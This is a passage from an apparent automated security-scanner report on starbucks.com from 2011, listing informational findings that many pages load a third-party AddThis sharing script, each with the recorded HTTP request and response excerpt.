Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:17 GMT
Connection: close
Content-Length: 38452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.16. http://www.starbucks.com/career-center/career-diversity/partner-networks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity/partner-networks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career-center/career-diversity/partner-networks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:22 GMT
Connection: close
Content-Length: 40582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.17. http://www.starbucks.com/career-center/international-positions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/international-positions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career-center/international-positions HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:26 GMT
Connection: close
Content-Length: 36558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.18. http://www.starbucks.com/career-center/working-at-starbucks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/working-at-starbucks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career-center/working-at-starbucks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:09 GMT
Connection: close
Content-Length: 43598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.19. http://www.starbucks.com/coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:07 GMT
Connection: close
Content-Length: 55844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.20. http://www.starbucks.com/coffee/learn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:34 GMT
Connection: close
Content-Length: 37490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.21. http://www.starbucks.com/coffee/learn/clover  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn/clover HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:51 GMT
Connection: close
Content-Length: 38935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.22. http://www.starbucks.com/coffee/learn/flavors-in-your-cup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn/flavors-in-your-cup HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:46 GMT
Connection: close
Content-Length: 43755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.23. http://www.starbucks.com/coffee/starbucks-natural-fusions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:12:33 GMT
Connection: close
Content-Length: 50482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.24. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/caramel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:55 GMT
Connection: close
Content-Length: 41222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.25. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/cinnamon HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:09 GMT
Connection: close
Content-Length: 41265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.26. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/savoring HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:28 GMT
Connection: close
Content-Length: 40000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.27. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/vanilla HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:36 GMT
Connection: close
Content-Length: 41191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.28. http://www.starbucks.com/coffee/starbucks-reserve-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:11:42 GMT
Connection: close
Content-Length: 56757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.29. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:12:17 GMT
Connection: close
Content-Length: 42135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.30. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:12:32 GMT
Connection: close
Content-Length: 40792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.31. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-blue-java

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/organic-blue-java HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:11:58 GMT
Connection: close
Content-Length: 40831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.32. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:12:09 GMT
Connection: close
Content-Length: 40633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.33. http://www.starbucks.com/coffee/via  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/via HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:11:08 GMT
Connection: close
Content-Length: 50149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.34. http://www.starbucks.com/coffee/via/flavored-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/via/flavored-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:11:35 GMT
Connection: close
Content-Length: 50132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
